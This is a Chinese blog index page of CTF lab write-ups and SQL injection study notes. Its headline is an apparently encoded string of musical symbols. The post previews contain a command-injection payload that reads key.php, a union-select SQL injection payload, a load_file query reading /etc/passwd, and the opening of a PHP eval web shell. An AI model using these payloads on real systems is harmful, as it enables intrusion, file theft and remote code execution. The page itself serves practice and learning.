T-Star学习笔记
记录T-Star学习笔记
秋风瑟瑟...
♯‖§‖∮♯♭∮♫♭§‖♪♭♭♯♩‖♩∮§♯♬¶‖♩♪§∮‖§♪♬♭§§♪♬♭§§♩♬∮♭♭¶¶¶∮♯♭♪♯♫‖‖‖♯♬‖‖‖‖♭‖‖‖‖♬‖‖‖‖♫‖‖‖‖♯‖‖‖♫♩‖‖‖‖‖‖‖‖‖♬‖‖‖‖♯‖‖‖‖§‖‖‖♯♬§♪♯♬§♯∮§♩♬♯‖♭♪‖§♯♬♩♬§♭¶∮♫♯♪♭♯♭♯‖‖♭♩♯‖‖♯♫♯♭♫♭♬♪==
展开
-
TSRC靶场赛-writeup
签到 文件上传JS验证,抓包or禁用JS 命令执行基础 啥都没过滤 payload:127.0.0.1|cat ../key.php 你能爆破吗 根据hint,爆破得到用户名admin、密码admin 再根据hint的cookie注入,继续判断字段、爆库、爆表、爆字段,得到flag 中间需要base64编码 成绩查询 union注入,同上 payload:-1' union select 1,2,3,flag from fl4g# 文件包含GetShell 文件上传点只能上传txt,再根据hint文原创 2020-06-30 22:07:57 · 236 阅读 · 0 评论 -
T-Star第三天学习记录
sql手工注入常规步骤 PS:这里学习笔记的常规步骤是针对union注入来说 找注入点,并判断注入点是否存在 例如添加',and 1=1,and 1=2 判断表中的字段数 order by 10,可采用二分法(效率高) 使用union联合查询 查询数据库中的数据 查询数据库 查询数据表 查询字段r 查询数据 文件操作 读取文件 select 1,2,load_file("/etc/passwd"),3,4 写入文件 select 1,2,"<?php @eval($_POST['cmd']?>原创 2020-06-12 22:39:28 · 369 阅读 · 0 评论